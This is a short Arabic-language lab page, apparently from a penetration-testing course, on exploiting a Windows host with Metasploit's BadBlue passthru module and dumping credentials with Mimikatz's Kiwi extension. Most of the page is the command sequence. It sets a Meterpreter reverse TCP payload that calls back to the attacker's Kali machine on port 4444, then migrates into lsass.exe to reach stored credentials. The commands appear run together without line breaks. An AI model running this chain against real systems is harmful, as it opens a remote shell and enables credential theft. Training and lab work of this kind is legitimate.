🧪 المختبر العملي 21 : استخراج بيانات الاعتماد باستخدام Kiwi Extension (Mimikatz)
📊 مرحلة الاستغلال (Exploitation)
msfconsole -quse exploit/windows/http/badblue_passthru set RHOSTS [Target_IP_Address] set LHOST [Your_Kali_IP_Address] set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp exploitmigrate -n lsass.exe # أو migrate [PID_of_lsass.exe] إذا عرفت PID من psgetuid
📊 مرحلة ما بعد الاستغلال: استخراج بيانات الاعتماد (Credential Dumping)
Previous👾3- The-Metasploit-Framework-MSF LABNext🧪 المختبر العملي 22 : الحفاظ على الوصول - خدمة الثبات (Maintaining Access – Persistence Service
Last updated

